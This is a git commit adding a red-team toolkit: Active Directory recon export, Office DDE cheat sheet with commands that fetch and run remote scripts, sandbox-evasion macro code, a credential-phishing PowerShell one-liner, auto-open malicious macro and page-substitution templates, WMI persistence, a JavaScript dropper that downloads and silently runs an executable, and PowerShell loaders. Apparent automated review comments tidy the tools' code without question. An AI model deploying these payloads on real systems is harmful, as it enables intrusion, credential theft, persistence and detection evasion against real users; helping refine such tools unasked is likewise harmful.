Renamed directory and added new script.

mb
2018-12-18 17:52:33 +01:00
parent bf6833a7cc
commit 27596f5104
26 changed files with 158 additions and 4 deletions


@ -0,0 +1,113 @@
#requires -version 2
<#
This script launches many PowerView cmdlets and stores their output
in Clixml files for later processing.
Author: Mariusz B. (mgeeky), '18
License: BSD 3-Clause
Required Dependencies: PowerSploit's Recon.psm1
#>
function Export-ReconData
{
$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-hh-mm-ss")
New-Item -Name $DirName -ItemType Directory | Out-Null
Write-Output "`n:: Logs to be stored in: $DirName`n"
$ReconModuleCommands = Get-Command -Module Recon
$Commands = @()
$ReconModuleCommands `
| Where-Object {$_.Name -like "Get-Net*"} `
| Select Name `
| ForEach-Object {$Commands += $_.Name}
$Commands += "Invoke-UserHunter -ShowAll"
$Commands += "Invoke-StealthUserHunter -ShowAll"
$Commands += "Invoke-FileFinder -SearchSYSVol"
$Commands += "Invoke-ShareFinder"
$Commands += "Invoke-MapDomainTrust"
$Commands += "Find-GPOLocation"
$Commands += "Get-NetUser -AdminCount"
$Commands += "Find-ForeignUser"
$Commands += "Find-ForeignGroup"
$Commands += "Invoke-FileFinder"
$Commands | ForEach-Object {
$Name = $_
$Name -match "[A-Za-z]+-(.+)" | Out-Null
$FileName = $matches[1] + ".xml"
$FileName = $FileName -replace ' ',''
If ($Name -like "Get-Net*")
{
#$Name = $Name + " -Recurse"
}
Write-Output "--- $Name ---"
$Name | Invoke-Expression | Export-Clixml $DirName\$FileName
Write-Output "Done.`n"
}
}
function Import-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
$Results = Import-Clixml -Path "$_"
New-Variable -Name $Name -Force -Value $Results -Scope Global
Write-Output "Loaded `$$Name results."
}
Set-Location -Path $path
}
function Get-ReconData
{
Param
(
[Parameter(Position = 0, Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$DirName
)
$path = Get-Location
$Variables = Get-Variable
Set-Location -Path $DirName
Get-ChildItem . -Filter *.xml |
Foreach-Object {
$Name = $_.BaseName -replace '-',''
If ($Variables | Where-Object { $_.Name -eq $Name })
{
Write-Output "Previously loaded: `$$Name"
}
}
Set-Location -Path $path
}
Try
{
# You need to be in PowerSploit\Recon directory
Import-Module .\Recon.psm1
}
Catch [System.Exception]
{
exit
}
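Review bot: The timestamp format at L23, `"PowerView-MM-dd-yyyy-hh-mm-ss"`, uses 12-hour `hh` with no AM/PM designator, so two runs twelve hours apart produce the same directory name and `New-Item` without `-Force` errors on the existing path; change it to `$DirName = (Get-Date).ToString("PowerView-MM-dd-yyyy-HH-mm-ss")`. In Import-ReconData and Get-ReconData the closing `Set-Location -Path $path` is skipped whenever Get-ChildItem or Import-Clixml throws, leaving the caller's session parked in the target directory; wrap the body in `try { ... } finally { Set-Location -Path $path }`, or avoid changing location altogether by passing `(Join-Path $DirName '*.xml')` to Get-ChildItem. The module-load `Catch` at L103-L106 calls `exit` with no message, which ends the session without saying why; a `Write-Error "Recon.psm1 not found in $(Get-Location)"` before `exit` would explain the failure. The README example for this script invokes `Load-ReconData`, which this file does not define; the function is `Import-ReconData`.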


@ -0,0 +1 @@
Invoke-Command 192.168.56.102 -Cred (New-Object -Type System.Management.Automation.PSCredential -ArgumentList "ieuser", $(ConvertTo-SecureString "Passw0rd!" -AsPlainText -Force)) {ipconfig}
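Review bot: The example commits a literal user name and password (`"ieuser"`, `"Passw0rd!"`) together with a host address; committed examples get copied verbatim, so replace them with placeholders such as `<HOST>`, `<USER>` and `<PASSWORD>`, or show the interactive form `Invoke-Command <HOST> -Cred (Get-Credential) {ipconfig}` and keep the `New-Object PSCredential` construction in a comment for the non-interactive case. Worth a comment as well: `ConvertTo-SecureString -AsPlainText -Force` on a literal leaves the password in the console history and in any PowerShell transcript or script block log that is enabled on the machine where it is typed.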


@ -0,0 +1,28 @@
## Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet
- Using `regsvr32` _*.sct_ files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
```
- Using `HTA` files technique:
```
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data || mshta http://192.168.56.101/poc.hta"
```
- Method from Empire - unfortunately unable to hide 'powershell.exe -NoP -sta -NonI' sequence
```
DDEAUTO C:\\Microsoft\\Programs\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.56.101/default.ps1');powershell -noP -sta -w 1 -enc $e "
```
- CactusTorch DDE can also generate files in **JS** and **VBS** formats.
They will utilize `cscript` as a file interpreter.
- Another option is to use scripts by _Dominic Spinosa_ found [here](https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads)
- Another option is to stick with `Unicorn` by _Dave Kennedy_
## Sources
- https://medium.com/red-team/dde-payloads-16629f4a2fcd


@ -0,0 +1,139 @@
Private Declare PtrSafe Function isDbgPresent Lib "kernel32" Alias "IsDebuggerPresent" () As Boolean
Public Function IsFileNameNotAsHexes() As Boolean
Dim str As String
Dim hexes As Variant
Dim only_hexes As Boolean
only_hexes = True
hexes = Array("0", "1", "2", "3", "4", "5", "6", "7", _
"8", "9", "a", "b", "c", "d", "e", "f")
str = ActiveDocument.name
str = Mid(str, 1, InStrRev(str, ".") - 1)
For i = 1 To UBound(hexes, 1) - 1
Dim ch As String
ch = LCase(Mid(str, i, 1))
If Not (UBound(Filter(hexes, ch)) > -1) Then
' Character not in hexes array.
only_hexes = False
Exit For
End If
Next
only_hexes = (Not only_hexes)
IsFileNameNotAsHexes = only_hexes
End Function
Public Function IsProcessListReliable() As Boolean
Dim objWMIService, objProcess, colProcess
Dim strComputer, strList
Dim bannedProcesses As Variant
bannedProcesses = Array("fiddler", "vxstream", _
"tcpview", "vmware", "procexp", "vmtools", "autoit", _
"wireshark", "procmon", "idaq", "autoruns", "apatedns", _
"windbg")
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" _
& strComputer & "\root\cimv2")
Set colProcess = objWMIService.ExecQuery _
("Select * from Win32_Process")
For Each objProcess In colProcess
For Each proc In bannedProcesses
If InStr(LCase(objProcess.name), LCase(proc)) <> 0 Then
' Found banned process.
IsProcessListReliable = False
Exit Function
End If
Next
Next
If isDbgPresent() Then
IsProcessListReliable = False
Exit Function
End If
IsProcessListReliable = (colProcess.Count() > 50)
End Function
Public Function IsHardwareReliable() As Boolean
Dim objWMIService, objItem, colItems, strComputer
Dim totalSize, totalMemory, cpusNum As Integer
totalSize = 0
totalMemory = 0
cpusNum = 0
Const wbemFlagReturnImmediately = &H10
Const wbemFlagForwardOnly = &H20
strComputer = "."
' Checking total HDD size
Set objWMIService = GetObject _
("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWMIService.ExecQuery _
("Select * from Win32_LogicalDisk")
For Each objItem In colItems
Dim num
num = Int(objItem.Size / 1073741824)
If num > 0 Then
totalSize = totalSize + num
End If
Next
If totalSize < 60 Then
' Total HDD size of the machine must be at least 60GB
IsHardwareReliable = False
Exit Function
End If
' Checking Memory
Set colComputer = objWMIService.ExecQuery _
("Select * from Win32_ComputerSystem")
For Each objComputer In colComputer
totalMemory = totalMemory + Int((objComputer.TotalPhysicalMemory) / 1048576) + 1
Next
If totalMemory < 1024 Then
' Total Memory is less than 1GB
IsHardwareReliable = False
Exit Function
End If
Set colItems2 = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
wbemFlagReturnImmediately + wbemFlagForwardOnly)
For Each objItem In colItems2
cpusNum = cpusNum + objItem.NumberOfLogicalProcessors
Next
If cpusNum < 2 Then
' Nowadays everyone has at least 2 logical cores.
IsHardwareReliable = False
Exit Function
End If
IsHardwareReliable = True
End Function
Public Function IsRunningInSandbox() As Boolean
Dim test As Boolean
If IsFileNameNotAsHexes() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsProcessListReliable() <> True Then
IsRunningInSandbox = True
Exit Function
ElseIf IsHardwareReliable() <> True Then
IsRunningInSandbox = True
Exit Function
End If
IsRunningInSandbox = False
End Function
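Review bot: The module has no header comment, unlike the other files in this commit, so a reader must work through four functions to learn what the sample demonstrates; add one stating that IsRunningInSandbox combines a document-name heuristic, a Win32_Process scan for the tool names listed at L165-L168, the `IsDebuggerPresent` import from kernel32 at L139, and Win32_LogicalDisk / Win32_ComputerSystem / Win32_Processor thresholds. The header should also say, for readers on the detection side, that these WMI queries issued from an Office process together with the `Declare PtrSafe ... Lib "kernel32"` import are the observable behaviour that detonation sandboxes and EDR rules key on, which is what makes the sample a useful detection test case. One language point: `Dim totalSize, totalMemory, cpusNum As Integer` at L192 types only `cpusNum`; the other two are Variant, which deserves a comment if intentional.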


@ -0,0 +1,24 @@
<#
try {
(Get-Credential -Credential $null).GetNetworkCredential() |
Select-Object @{name="User"; expression = {
If ($_.Domain -ne [string]::Empty) {
"{0}\{1}" -f ($_.Domain), ($_.UserName)
} Else {
$_.UserName
}
}
}, Password | Format-List
} catch {
}
One can additionally add, right after Get-Credential following parameters that could improve
pretext's quality during social engineering attempt:
-Credential domain\username - when we know our victim's domain and/or username - we can supply this info to the dialog
-Message "Some luring sentence" - to include some luring message
#>
try { ((Get-Credential -Credential $null).GetNetworkCredential() | Select-Object @{name="User"; expression={If ($_.Domain -ne [string]::Empty) {"{0}\{1}" -f ($_.Domain), ($_.UserName)} Else { $_.UserName} }}, Password | Format-List) } catch { }
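Review bot: The header comment at L257-L274 explains the pretext options but not where the captured values end up: `Format-List` writes the user name and password to standard output in clear text, and the one-liner itself is recorded verbatim by PowerShell script block logging (event 4104) and by transcription where they are enabled. Add a sentence saying so, so that anyone reusing the sample in an awareness exercise knows the output and the command line both land in logs. The empty `catch { }` also hides the case where the user cancels the dialog; a comment stating that silence on cancel is intended would stop the next reader treating it as an oversight.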

red-teaming/README.md Normal file

@ -0,0 +1,177 @@
## Red Teaming and Social-Engineering related scripts, tools and CheatSheets
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
Example:
```
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
```
- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c))
- **`Export-ReconData.ps1`** - Powershell script leveraging [PowerSploit Recon](https://github.com/PowerShellMafia/PowerSploit) module (PowerView) to save output from Reconnaissance cmdlets like `Get-Net*`, `Invoke-*` into _Clixml_ files. Those files can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread.
Exposed functions:
- `Export-ReconData` - Launches many cmdlets and exports their Clixml outputs.
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
```
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results.
Loaded $ForeignGroup results.
Loaded $ForeignUser results.
Loaded $GPOLocation results.
Loaded $MapDomainTrust results.
Loaded $NetComputer results.
Loaded $NetDomain results.
Loaded $NetDomainController results.
Loaded $NetDomainTrust results.
Loaded $NetFileServer results.
Loaded $NetForest results.
Loaded $NetForestCatalog results.
Loaded $NetForestDomain results.
Loaded $NetForestTrust results.
Loaded $NetGPO results.
Loaded $NetGPOGroup results.
Loaded $NetGroup results.
Loaded $NetGroupMember results.
Loaded $NetLocalGroup results.
Loaded $NetLoggedon results.
Loaded $NetOU results.
Loaded $NetProcess results.
Loaded $NetRDPSession results.
Loaded $NetSession results.
Loaded $NetShare results.
Loaded $NetSite results.
Loaded $NetSubnet results.
Loaded $NetUserAdminCount results.
Loaded $NetUser results.
Loaded $ShareFinder results.
Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results.
```
- **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb))
Example output **not minimized**:
```
C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildPowershellXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV">
<hwiJYmWvD />
</Target>
<UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class hwiJYmWvD : Task {
public override bool Execute() {
byte[] payload = System.Convert.FromBase64String("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");
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
------------------------------------------------------------------------------------
```
**minimized**
```
C:\Users\IEUser\Desktop\files\video>python generateMSBuildPowershellXML.py Show-Msgbox.ps1 -m
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="mYOYInAFWE"><DpaYaokgauWBJbe /></Target><UsingTask TaskName="DpaYaokgauWBJbe" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class DpaYaokgauWBJbe:Task{public override bool Execute(){byte[] x=System.Convert.FromBase64String("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");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=RunspaceFactory.CreateRunspace();r.Open();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]></Code></Task></UsingTask></Project>
------------------------------------------------------------------------------------
```
- **`Invoke-Command-Cred-Example.ps1`** - Example of using PSRemoting with credentials passed directly from command line. ([gist](https://gist.github.com/mgeeky/de4ecf952ddce774d241b85cfbf97faf))
- **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`Macro-Less-Cheatsheet.md`** - Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet ([gist](https://gist.github.com/mgeeky/981213b4c73093706fc2446deaa5f0c5))
- **`macro-psh-stdin-author.vbs`** - VBS Social Engineering Macro with Powershell invocation taking arguments from Author property and feeding them to StdIn. ([gist](https://gist.github.com/mgeeky/50c4b7fa22d930a80247fea62755fbd3))
- **`msbuild-powershell-msgbox.xml`** - Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script.
([gist](https://gist.github.com/mgeeky/617c54a23f0c4e99e6f475e6af070810))
- **`muti-stage-1.md`** - Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. ([gist](https://gist.github.com/mgeeky/6097ea56e0f541aa7d98161e2aa76dfb))
- **`Phish-Creds.ps1`** - Powershell oneline Credentials Phisher - to be used in malicious Word Macros/VBA/HTA or other RCE commands on seized machine. ([gist](https://gist.github.com/mgeeky/a404d7f23c85954650d686bb3f02abaf))
One can additionally add, right after `Get-Credential` following parameters that could improve pretext's quality during social engineering attempt:
- `-Credential domain\username` - when we know our victim's domain and/or username - we can supply this info to the dialog
- `-Message "Some luring sentence"` - to include some luring message
- [**`PhishingPost`**](https://github.com/mgeeky/PhishingPost) - (PHP Script intdended to be used during Phishing campaigns as a credentials collector linked to backdoored HTML <form> action parameter.
- [**`RobustPentestMacro`**](https://github.com/mgeeky/RobustPentestMacro) - This is a rich-featured Visual Basic macro code for use during Penetration Testing assignments, implementing various advanced post-exploitation techniques.
- **`set-handler.rc`** - Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. ([gist](https://gist.github.com/mgeeky/bf4d732aa6e602ca9b77d089fd3ea7c9))
- **`SubstitutePageMacro.vbs`** - This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ). ([gist](https://gist.github.com/mgeeky/3c705560c5041ab20c62f41e917616e6))
- **`warnings\EN-Word.docx`** and **`warnings\EN-Excel.docx`** - Set of ready-to-use Microsoft Office Word shapes that can be pasted / inserted into malicious documents for enticing user into clicking "Enable Editing" and "Enable Content" buttons.
- **`WMIPersistence.vbs`** - Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up. ([gist](https://gist.github.com/mgeeky/d00ba855d2af73fd8d7446df0f64c25a))
- **`Various-Macro-Based-RCEs.md`** - Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))
- **`vba-macro-mac-persistence.vbs`** - (WIP) Working on VBA-based MacPersistance functionality for MS Office for Mac Macros. ([gist](https://gist.github.com/mgeeky/dd184e7f50dfab5ac97b4855f23952bc))
- **`vba-windows-persistence.vbs`** - VBA Script implementing two windows persistence methods - via WMI EventFilter object and via simple Registry Run. ([gist](https://gist.github.com/mgeeky/07ffbd9dbb64c80afe05fb45a0f66f81))
- [**`VisualBasicObfuscator`**](https://github.com/mgeeky/VisualBasicObfuscator) - Visual Basic Code universal Obfuscator intended to be used during penetration testing assignments.


@ -0,0 +1,74 @@
Public alreadyLaunched As Integer
Private Sub Malware()
'
' ============================================
'
' Enter here your malware code here.
' It will be started on auto open surely.
'
' ============================================
MsgBox ("Here comes the malware!")
' ============================================
End Sub
Private Sub Launch()
If alreadyLaunched = True Then
Exit Sub
End If
Malware
SubstitutePage
alreadyLaunched = True
End Sub
Private Sub SubstitutePage()
'
' This routine will take the entire Document's contents,
' delete them and insert in their place contents defined in
' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
'
Dim doc As Word.Document
Dim firstPageRange As Range
Dim rng As Range
Dim autoTextTemplateName As String
' This is the name of the defined AutoText prepared in the document,
' to be inserted in place of previous contents.
autoTextTemplateName = "RealDoc"
Set firstPageRange = Word.ActiveDocument.Range
firstPageRange.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Set doc = ActiveDocument
Set rng = doc.Sections(1).Range
doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
doc.Save
End Sub
Sub AutoOpen()
' Becomes launched as first on MS Word
Launch
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
Launch
End Sub
Sub Auto_Open()
' Becomes launched as first on MS Excel
Launch
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
Launch
End Sub
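Review bot: `alreadyLaunched` at L416 is declared `Integer` but is only ever compared with and assigned `True`; declare it `Public alreadyLaunched As Boolean` so the guard in Launch reads as the flag it is. `doc.Save` at L456 writes the substituted body back to the file on disk, which the routine's header at L437-L441 does not mention; note it there, since after the save the document on disk no longer matches the copy as delivered and its modification time changes, both of which matter to anyone comparing the two. The four entry points at L458-L473 each carry a one-line comment, but a short module header saying that Launch is idempotent through `alreadyLaunched` would explain why four hooks can safely call it.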



@ -0,0 +1,77 @@
'
' SYNOPSIS:
' WMI Persistence method as originally presented by SEADADDY malware
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887)
' and further documented by Matt Graeber.
'
' The scheduled command will be launched after roughly 3 minutes since system
' gets up. Also, even if the command shall spawn a window - it will not be visible,
' since the command will get invoked by WmiPrvSE.exe that's running in Session 0.
'
' USAGE:
' WMIPersistence("command to be launched", "taskName")
'
' EXAMPLE:
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
'
' AUTHOR:
' Mariusz B. / mgeeky, '17
'
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
Dim filterName, consumerName As String
Dim objLocator, objService1
Dim objInstances1, objInstances2, objInstances3
Dim newObj1, newObj2, newObj3
On Error GoTo Failed
filterName = taskName & "Event"
consumerName = taskName & "Consumer"
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
Set objService1 = objLocator.ConnectServer(".", "root\subscription")
'
' Step 1: Set WMI Instance of type Event Filter
'
Set objInstances1 = objService1.Get("__EventFilter")
' The malware originally will kicks in after roughly 3 minutes since System gets up.
' One can modify this delay time by modifying the WHERE clausule of the below query.
query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " _
& "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " _
& "AND TargetInstance.SystemUpTime >= 200 AND " _
& "TargetInstance.SystemUpTime < 320"
' New object of type __EventFilter
Set newObj1 = objInstances1.Spawninstance_
newObj1.name = filterName
newObj1.eventNamespace = "root\cimv2"
newObj1.QueryLanguage = "WQL"
newObj1.query = query
newObj1.Put_
'
' Step 2: Set WMI instance of type: CommandLineEventConsumer
'
Set objInstances2 = objService1.Get("CommandLineEventConsumer")
Set newObj2 = objInstances2.Spawninstance_
newObj2.name = consumerName
newObj2.CommandLineTemplate = exePath
newObj2.Put_
'
' Step 3: Set WMI instance of type: Filter To Consumer Binding
'
Set objInstances3 = objService1.Get("__FilterToConsumerBinding")
Set newObj3 = objInstances3.Spawninstance_
newObj3.Filter = "__EventFilter.Name=""" & filterName & """"
newObj3.Consumer = "CommandLineEventConsumer.Name=""" & consumerName & """"
newObj3.Put_
WMIPersistence = True
Exit Function
Failed:
WMIPersistence = False
End Function
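Review bot: The header at L480-L498 documents usage but not the three objects the function leaves in `root\subscription` or how to find and remove them; add that the `__EventFilter` named `<taskName>Event`, the `CommandLineEventConsumer` named `<taskName>Consumer` and the `__FilterToConsumerBinding` that joins them can be enumerated with `Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding` and are logged by Sysmon as WmiEvent events 19, 20 and 21, which is what makes this sample usable as a detection test. `Dim filterName, consumerName As String` at L500 types only `consumerName`, and `query` at L515 is never declared; under `Option Explicit` the module would not compile, so either add `Dim query As String` and type both names, or state at the top that the module relies on implicit Variants.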


@ -0,0 +1,26 @@
<script>
var SRC = "";
var CMDLINE = "";
var out = Math.random().toString(36).substring(7) + ".exe";
var axo = this.ActiveXObject;
var wshell = new axo("WScript.Shell");
var path = wshell.ExpandEnvironmentStrings("%TEMP%") + "/" + out;
var xhr = new axo("MSXML2.XMLHTTP");
xhr.onreadystatechange = function () {
if (xhr.readystate === 4) {
var adodb = new axo("ADODB.Stream");
adodb.open();
adodb.type = 1;
adodb.write(xhr.ResponseBody);
adodb.position = 0;
adodb.saveToFile(path, 2);
adodb.close();
};
};
try {
xhr.open("GET", SRC, false);
xhr.send();
wshell.Run(path + " " + CMDLINE, 0, false);
} catch (err) { };
</script>
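Review bot: This file has no header comment, unlike the other samples in the commit; add one that states what the template does and the artifacts it produces, since the README's description relies on that: it fetches `SRC` with `MSXML2.XMLHTTP`, writes the body through `ADODB.Stream` to a randomly named `.exe` under `%TEMP%` (L554-L557), and starts it with `WScript.Shell.Run` using window style 0 (L573). The header should also say that `SRC` and `CMDLINE` at L552-L553 are the two values the user is expected to fill in, because as committed the empty `SRC` makes `xhr.open` throw and the surrounding `try ... catch (err) { }` hides that silently.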


@ -0,0 +1,69 @@
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Resources;
using System.Net;
using System.Collections.ObjectModel;
//
// Use NuGet to install System.Management.Automation reference.
//
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace ConsoleApplication2
{
class Program
{
//
// This function and concept comes from PowerPick / SharpPick project by Sixdub:
// https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
//
static string RunPS(string cmd)
{
// Init stuff
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
Pipeline pipeline = runspace.CreatePipeline();
// Add commands
pipeline.Commands.AddScript(cmd);
// Prep PS for string output and invoke
pipeline.Commands.Add("Out-String");
Collection<PSObject> results = pipeline.Invoke();
runspace.Close();
// Convert records to strings
StringBuilder stringBuilder = new StringBuilder();
foreach (PSObject obj in results)
{
stringBuilder.Append(obj);
}
return stringBuilder.ToString().Trim();
}
static void Main()
{
Console.WriteLine("Updating ClickOnce application. Please wait...");
//
// Here comes your Base64 encoded Powershell payload.
// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
// that will spawn a process and insert there some shellcode.
// You can prepare Base64 UTF8 shellcode via:
// PS> $text = Get-Content yourShellcode.ps1
// PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
// PS> $encoded = [Convert]::ToBase64String($bytes);
// PS> $encoded | Out-File "myEncodedShellcode.ps1"
//
String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
}
}
}
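Review bot: `scriptInvoker` at L606 is created and never used, and the `Runspace` is only closed on the success path even though it is IDisposable; drop the `RunspaceInvoke` line and wrap the runspace as `using (Runspace runspace = RunspaceFactory.CreateRunspace()) { ... }`, which also removes a dependency on a type that is marked obsolete in newer System.Management.Automation builds (confirm against the package version you reference). The `using` directives for System.IO, System.Resources, System.Net, System.Linq and System.Collections.Generic are unused in this file. The comment block at L629-L633 tells the reader to encode with `Encoding.Unicode` while `Main` decodes with `Encoding.UTF8` at L636; one of the two should change, or the comment should explain why they differ.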


@ -0,0 +1,30 @@
#!/usr/bin/python3
import io
import sys
import gzip
import base64
def main(argv):
if len(argv) < 2:
print('Usage: ./compressedPowershell.py <input>')
sys.exit(-1)
out = io.BytesIO()
encoded = ''
with open(argv[1], 'rb') as f:
inp = f.read()
with gzip.GzipFile(fileobj = out, mode = 'w') as fo:
fo.write(inp)
encoded = base64.b64encode(out.getvalue())
powershell = '''$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String("{}"));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'''.format(encoded.decode())
print(powershell)
if __name__ == '__main__':
main(sys.argv)
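Review bot: The usage message at L651 goes to stdout, where it mixes with the generated snippet callers are expected to capture, and `sys.exit(-1)` becomes exit status 255; the sibling generateMSBuildPowershellXML.py in this commit writes its banner to stderr, so for consistency use `print('Usage: ./compressedPowershell.py <input>', file=sys.stderr)` and `sys.exit(1)`. `encoded = ''` at L654 is initialised as `str` but reassigned `bytes` on L659; drop the initialisation or make it `b''`. A one-line module docstring saying the output is a PowerShell snippet that gunzips and IEXes the input would match the header the other scripts carry.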


@ -0,0 +1,12 @@
